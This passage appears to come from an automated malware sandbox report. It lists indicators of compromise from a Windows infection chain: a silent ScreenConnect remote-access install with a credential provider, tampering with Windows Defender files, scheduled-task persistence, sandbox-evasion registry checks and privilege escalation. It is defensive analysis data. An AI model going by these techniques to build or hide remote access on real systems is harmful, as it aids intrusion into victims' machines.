(f63a82ffaf9f93d1)\ScreenConnect.WindowsCredentialProvider.dll msiexec.exe File created C:\Program Files (x86)\ScreenConnect Client (f63a82ffaf9f93d1)\app.config msiexec.exe File created C:\Program Files (x86)\ScreenConnect Client (f63a82ffaf9f93d1)\system.config msiexec.exe File opened for modification C:\Program Files\Windows Defender\es-ES\ProtectionManagement.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\it-IT\ProtectionManagement_Uninstall.mfl cmd.exe File opened for modification C:\Program Files (x86)\Windows Defender\ja-JP\EppManifest.dll.mui cmd.exe File created C:\Program Files (x86)\ScreenConnect Client (f63a82ffaf9f93d1)\ScreenConnect.WindowsBackstageShell.exe.config msiexec.exe -
Drops file in Windows directory 32 IoCs
description ioc Process File created C:\Windows\Installer\e582fa6.msi msiexec.exe File opened for modification C:\Windows\IstRepresentative TbV75ZR.exe File opened for modification C:\Windows\ThinksMartin TbV75ZR.exe File opened for modification C:\Windows\Installer\MSI3390.tmp msiexec.exe File opened for modification C:\Windows\Installer\{F2D9E338-36BD-B769-CD92-1C2995F4239A}\DefaultIcon msiexec.exe File opened for modification C:\Windows\FinancingPortable WLbfHbp.exe File opened for modification C:\Windows\DollStriking WLbfHbp.exe File created C:\Windows\Installer\{F2D9E338-36BD-B769-CD92-1C2995F4239A}\DefaultIcon msiexec.exe File opened for modification C:\Windows\MandateFlashing TbV75ZR.exe File opened for modification C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.log msiexec.exe File opened for modification C:\Windows\Installer\MSI311D.tmp msiexec.exe File created C:\Windows\Installer\wix{F2D9E338-36BD-B769-CD92-1C2995F4239A}.SchedServiceConfig.rmi MsiExec.exe File opened for modification C:\Windows\VeryBulk TbV75ZR.exe File created C:\Windows\Installer\SourceHash{F2D9E338-36BD-B769-CD92-1C2995F4239A} msiexec.exe File opened for modification C:\Windows\AdministratorNhs TbV75ZR.exe File opened for modification C:\Windows\ThoseTransit TbV75ZR.exe File opened for modification C:\Windows\SinghCooling TbV75ZR.exe File opened for modification C:\Windows\DollStriking TbV75ZR.exe File opened for modification C:\Windows\MandateFlashing WLbfHbp.exe File opened for modification C:\Windows\IstRepresentative WLbfHbp.exe File opened for modification C:\Windows\ThoseTransit WLbfHbp.exe File opened for modification C:\Windows\Installer\e582fa6.msi msiexec.exe File opened for modification C:\Windows\FinancingPortable TbV75ZR.exe File opened for modification C:\Windows\AdministratorNhs WLbfHbp.exe File opened for modification C:\Windows\Installer\ msiexec.exe File created C:\Windows\Installer\inprogressinstallinfo.ipi msiexec.exe File created C:\Windows\Tasks\rapes.job df504a29ad522d6eabe6258886d296bc.exe File opened for modification C:\Windows\VeryBulk WLbfHbp.exe File opened for modification C:\Windows\ThinksMartin WLbfHbp.exe File opened for modification C:\Windows\Installer\MSI314D.tmp msiexec.exe File created C:\Windows\Installer\e582fa8.msi msiexec.exe File opened for modification C:\Windows\SinghCooling WLbfHbp.exe -
Launches sc.exe 38 IoCs
Sc.exe is a Windows utlilty to control services on the system.
pid Process 1112 sc.exe 820 sc.exe 820 sc.exe 1760 sc.exe 3456 sc.exe 1520 sc.exe 3740 sc.exe 3244 sc.exe 4008 sc.exe 3140 sc.exe 1780 sc.exe 4156 sc.exe 620 sc.exe 2188 sc.exe 2380 sc.exe 1676 sc.exe 3300 sc.exe 2684 sc.exe 1676 sc.exe 2224 sc.exe 1204 sc.exe 2380 sc.exe 4888 sc.exe 4812 sc.exe 3300 sc.exe 2392 sc.exe 968 sc.exe 2684 sc.exe 952 sc.exe 1004 sc.exe 3600 sc.exe 4888 sc.exe 3456 sc.exe 3300 sc.exe 3176 sc.exe 776 sc.exe 2188 sc.exe 924 sc.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Program crash 2 IoCs
pid pid_target Process procid_target 3244 4664 WerFault.exe 118 6444 2292 WerFault.exe 241 -
System Location Discovery: System Language Discovery 1 TTPs 64 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language TbV75ZR.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 8809b51fa3.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language TempVBA0JPEY88QDVDR7NTDRHN0ZZ672XGNN.EXE Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language tasklist.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Nls\Language\InstallLanguage 66db0435e2.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language findstr.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 66db0435e2.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language CMD.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language tool.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language MsiExec.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 896b7f95b4.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language df504a29ad522d6eabe6258886d296bc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language findstr.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 1cf4d08f1a.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language dc3db1808a.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language tasklist.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language WLbfHbp.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language ScreenConnect.ClientService.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 11.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskkill.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language msiexec.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Exam.com Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language MSBuild.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language findstr.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskkill.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language rapes.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language extrac32.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language choice.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language e7dd32382e.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language findstr.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language mshta.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language rundll32.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Exam.com Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskkill.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskkill.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language MsiExec.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language apple.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language extrac32.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Nls\Language 66db0435e2.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskkill.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language timeout.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language MsiExec.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language findstr.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language choice.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language tasklist.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language CMD.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language BIm18E9.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language tasklist.exe -
Checks SCSI registry key(s) 3 TTPs 5 IoCs
SCSI information is often read in order to detect sandboxing environments.
description ioc Process Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Device Parameters\Partmgr vssvc.exe Set value (data) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Device Parameters\Partmgr\PartitionTableCache = 00000000040000004b43892b2f3264420000000000000000000000000000000000000000000000000000000000000000000000000000000000001000000000000000c01200000000ffffffff0000000027010100000800004b43892b0000000000001000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000d01200000000000020ed3a000000ffffffff0000000007000100006809004b43892b000000000000d012000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000f0ff3a0000000000000005000000ffffffff000000000700010000f87f1d4b43892b000000000000f0ff3a00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000ffffffff0000000000000000000000004b43892b00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 vssvc.exe Set value (data) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Device Parameters\Partmgr\SnapshotDataCache = 534e41505041525401000000700000008ec7416a0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 vssvc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Device Parameters vssvc.exe Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Device Parameters vssvc.exe -
Checks processor information in registry 2 TTPs 20 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz firefox.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 ScreenConnect.WindowsClient.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz firefox.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 firefox.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 firefox.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz firefox.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 firefox.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz firefox.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString ScreenConnect.WindowsClient.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Signature firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision firefox.exe -
Delays execution with timeout.exe 2 IoCs
pid Process 4316 timeout.exe 3828 timeout.exe -
Kills process with taskkill 5 IoCs
pid Process 3332 taskkill.exe 2632 taskkill.exe 700 taskkill.exe 4684 taskkill.exe 736 taskkill.exe -
Modifies data under HKEY_USERS 13 IoCs
description ioc Process Key deleted \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\27 msiexec.exe Key created \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\28 msiexec.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ ScreenConnect.WindowsClient.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" ScreenConnect.WindowsClient.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" ScreenConnect.ClientService.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" ScreenConnect.ClientService.exe Key deleted \REGISTRY\USER\.DEFAULT\SOFTWARE\CLASSES\LOCAL SETTINGS\MUICACHE\27\52C64B7E msiexec.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" ScreenConnect.WindowsClient.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" ScreenConnect.WindowsClient.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" ScreenConnect.WindowsClient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ ScreenConnect.ClientService.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" ScreenConnect.ClientService.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" ScreenConnect.ClientService.exe -
Modifies registry class 37 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\sc-f63a82ffaf9f93d1\shell\open\command\ = "\"C:\\Program Files (x86)\\ScreenConnect Client (f63a82ffaf9f93d1)\\ScreenConnect.WindowsClient.exe\" \"%1\"" msiexec.exe Key created \REGISTRY\MACHINE\Software\Classes\CLSID\{6FF59A85-BC37-4CD4-C7A7-316889DB6DBE} msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{6FF59A85-BC37-4CD4-C7A7-316889DB6DBE}\InprocServer32\ThreadingModel = "Apartment" msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\833E9D2FDB63967BDC29C192594F32A9\SourceList\LastUsedSource = "n;1;C:\\Users\\Admin\\AppData\\Local\\Temp\\ScreenConnect\\24.4.4.9118\\f63a82ffaf9f93d1\\" msiexec.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\sc-f63a82ffaf9f93d1\UseOriginalUrlEncoding = "1" msiexec.exe Key created \REGISTRY\MACHINE\Software\Classes\CLSID\{6FF59A85-BC37-4CD4-C7A7-316889DB6DBE}\InprocServer32 msiexec.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\833E9D2FDB63967BDC29C192594F32A9 msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\833E9D2FDB63967BDC29C192594F32A9\PackageCode = "833E9D2FDB63967BDC29C192594F32A9" msiexec.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\833E9D2FDB63967BDC29C192594F32A9\AuthorizedLUAApp = "0" msiexec.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\sc-f63a82ffaf9f93d1 msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\UpgradeCodes\5B15089AFED232366FA328FFFAF9391D\833E9D2FDB63967BDC29C192594F32A9 msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\833E9D2FDB63967BDC29C192594F32A9\SourceList\Media\1 = ";" msiexec.exe Key created \REGISTRY\MACHINE\Software\Classes\sc-f63a82ffaf9f93d1 msiexec.exe Key created \REGISTRY\MACHINE\Software\Classes\sc-f63a82ffaf9f93d1\shell\open\command msiexec.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\sc-f63a82ffaf9f93d1\shell\open msiexec.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\sc-f63a82ffaf9f93d1\shell\open\command msiexec.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Features\833E9D2FDB63967BDC29C192594F32A9 msiexec.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\833E9D2FDB63967BDC29C192594F32A9\Language = "1033" msiexec.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\833E9D2FDB63967BDC29C192594F32A9\Assignment = "1" msiexec.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\833E9D2FDB63967BDC29C192594F32A9\SourceList\Net msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{6FF59A85-BC37-4CD4-C7A7-316889DB6DBE}\ = "ScreenConnect Client (f63a82ffaf9f93d1) Credential Provider" msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\833E9D2FDB63967BDC29C192594F32A9\SourceList\PackageName = "ScreenConnect.ClientSetup.msi" msiexec.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\833E9D2FDB63967BDC29C192594F32A9\SourceList\Media msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\sc-f63a82ffaf9f93d1\URL Protocol msiexec.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\833E9D2FDB63967BDC29C192594F32A9\Version = "402915332" msiexec.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\UpgradeCodes\5B15089AFED232366FA328FFFAF9391D msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\833E9D2FDB63967BDC29C192594F32A9\SourceList\Net\1 = "C:\\Users\\Admin\\AppData\\Local\\Temp\\ScreenConnect\\24.4.4.9118\\f63a82ffaf9f93d1\\" msiexec.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\sc-f63a82ffaf9f93d1\shell msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{6FF59A85-BC37-4CD4-C7A7-316889DB6DBE}\InprocServer32\ = "C:\\Program Files (x86)\\ScreenConnect Client (f63a82ffaf9f93d1)\\ScreenConnect.WindowsCredentialProvider.dll" msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Features\833E9D2FDB63967BDC29C192594F32A9\Full msiexec.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\833E9D2FDB63967BDC29C192594F32A9\AdvertiseFlags = "388" msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\833E9D2FDB63967BDC29C192594F32A9\ProductIcon = "C:\\Windows\\Installer\\{F2D9E338-36BD-B769-CD92-1C2995F4239A}\\DefaultIcon" msiexec.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\833E9D2FDB63967BDC29C192594F32A9\InstanceType = "0" msiexec.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\833E9D2FDB63967BDC29C192594F32A9\DeploymentFlags = "3" msiexec.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\833E9D2FDB63967BDC29C192594F32A9\SourceList msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\833E9D2FDB63967BDC29C192594F32A9\ProductName = "ScreenConnect Client (f63a82ffaf9f93d1)" msiexec.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\833E9D2FDB63967BDC29C192594F32A9\Clients = 3a0000000000 msiexec.exe -
Scheduled Task/Job: Scheduled Task 1 TTPs 2 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 4308 schtasks.exe 4724 schtasks.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 5052 df504a29ad522d6eabe6258886d296bc.exe 5052 df504a29ad522d6eabe6258886d296bc.exe 3256 rapes.exe 3256 rapes.exe 4132 8809b51fa3.exe 4132 8809b51fa3.exe 4132 8809b51fa3.exe 4132 8809b51fa3.exe 4132 8809b51fa3.exe 4132 8809b51fa3.exe 4664 Exam.com 4664 Exam.com 4664 Exam.com 4664 Exam.com 4664 Exam.com 4664 Exam.com 1784 BIm18E9.exe 1784 BIm18E9.exe 2088 powershell.exe 2088 powershell.exe 2088 powershell.exe 2728 rapes.exe 2728 rapes.exe 4712 msiexec.exe 4712 msiexec.exe 3720 powershell.exe 3720 powershell.exe 3720 powershell.exe 4876 ScreenConnect.ClientService.exe 4876 ScreenConnect.ClientService.exe 2868 TempVBA0JPEY88QDVDR7NTDRHN0ZZ672XGNN.EXE 2868 TempVBA0JPEY88QDVDR7NTDRHN0ZZ672XGNN.EXE 4876 ScreenConnect.ClientService.exe 4876 ScreenConnect.ClientService.exe 4876 ScreenConnect.ClientService.exe 4876 ScreenConnect.ClientService.exe 2184 powershell.exe 2184 powershell.exe 2184 powershell.exe 4512 powershell.exe 4512 powershell.exe 4512 powershell.exe 2244 powershell.exe 2244 powershell.exe 2244 powershell.exe 1584 e7dd32382e.exe 1584 e7dd32382e.exe 2188 483d2fa8a0d53818306efeb32d3.exe 2188 483d2fa8a0d53818306efeb32d3.exe 1584 e7dd32382e.exe 1584 e7dd32382e.exe 1584 e7dd32382e.exe 1584 e7dd32382e.exe 4664 Exam.com 4664 Exam.com 4664 Exam.com 4664 Exam.com 4812 svchost.exe 4812 svchost.exe 4812 svchost.exe 4812 svchost.exe 2292 Exam.com 2292 Exam.com 2292 Exam.com -
Suspicious behavior: LoadsDriver 2 IoCs
pid Process 656 Process not Found 656 Process not Found -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeDebugPrivilege 3564 tasklist.exe Token: SeDebugPrivilege 4380 tasklist.exe Token: SeDebugPrivilege 2204 tool.exe Token: SeShutdownPrivilege 2184 msiexec.exe Token: SeIncreaseQuotaPrivilege 2184 msiexec.exe Token: SeSecurityPrivilege 4712 msiexec.exe Token: SeCreateTokenPrivilege 2184 msiexec.exe Token: SeAssignPrimaryTokenPrivilege 2184 msiexec.exe Token: SeLockMemoryPrivilege 2184 msiexec.exe Token: SeIncreaseQuotaPrivilege 2184 msiexec.exe Token: SeMachineAccountPrivilege 2184 msiexec.exe Token: SeTcbPrivilege 2184 msiexec.exe Token: SeSecurityPrivilege 2184 msiexec.exe Token: SeTakeOwnershipPrivilege 2184 msiexec.exe Token: SeLoadDriverPrivilege 2184 msiexec.exe Token: SeSystemProfilePrivilege 2184 msiexec.exe Token: SeSystemtimePrivilege 2184 msiexec.exe Token: SeProfSingleProcessPrivilege 2184 msiexec.exe Token: SeIncBasePriorityPrivilege 2184 msiexec.exe Token: SeCreatePagefilePrivilege 2184 msiexec.exe Token: SeCreatePermanentPrivilege 2184 msiexec.exe Token: SeBackupPrivilege 2184 msiexec.exe Token: SeRestorePrivilege 2184 msiexec.exe Token: SeShutdownPrivilege 2184 msiexec.exe Token: SeDebugPrivilege 2184 msiexec.exe Token: SeAuditPrivilege 2184 msiexec.exe Token: SeSystemEnvironmentPrivilege 2184 msiexec.exe Token: SeChangeNotifyPrivilege 2184 msiexec.exe Token: SeRemoteShutdownPrivilege 2184 msiexec.exe Token: SeUndockPrivilege 2184 msiexec.exe Token: SeSyncAgentPrivilege 2184 msiexec.exe Token: SeEnableDelegationPrivilege 2184 msiexec.exe Token: SeManageVolumePrivilege 2184 msiexec.exe Token: SeImpersonatePrivilege 2184 msiexec.exe Token: SeCreateGlobalPrivilege 2184 msiexec.exe Token: SeCreateTokenPrivilege 2184 msiexec.exe Token: SeAssignPrimaryTokenPrivilege 2184 msiexec.exe Token: SeLockMemoryPrivilege 2184 msiexec.exe Token: SeIncreaseQuotaPrivilege 2184 msiexec.exe Token: SeMachineAccountPrivilege 2184 msiexec.exe Token: SeTcbPrivilege 2184 msiexec.exe Token: SeSecurityPrivilege 2184 msiexec.exe Token: SeTakeOwnershipPrivilege 2184 msiexec.exe Token: SeLoadDriverPrivilege 2184 msiexec.exe Token: SeSystemProfilePrivilege 2184 msiexec.exe Token: SeSystemtimePrivilege 2184 msiexec.exe Token: SeProfSingleProcessPrivilege 2184 msiexec.exe Token: SeIncBasePriorityPrivilege 2184 msiexec.exe Token: SeCreatePagefilePrivilege 2184 msiexec.exe Token: SeCreatePermanentPrivilege 2184 msiexec.exe Token: SeBackupPrivilege 2184 msiexec.exe Token: SeRestorePrivilege 2184 msiexec.exe Token: SeShutdownPrivilege 2184 msiexec.exe Token: SeDebugPrivilege 2184 msiexec.exe Token: SeAuditPrivilege 2184 msiexec.exe Token: SeSystemEnvironmentPrivilege 2184 msiexec.exe Token: SeChangeNotifyPrivilege 2184 msiexec.exe Token: SeRemoteShutdownPrivilege 2184 msiexec.exe Token: SeUndockPrivilege 2184 msiexec.exe Token: SeSyncAgentPrivilege 2184 msiexec.exe Token: SeEnableDelegationPrivilege 2184 msiexec.exe Token: SeManageVolumePrivilege 2184 msiexec.exe Token: SeImpersonatePrivilege 2184 msiexec.exe Token: SeCreateGlobalPrivilege 2184 msiexec.exe -
Suspicious use of FindShellTrayWindow 41 IoCs
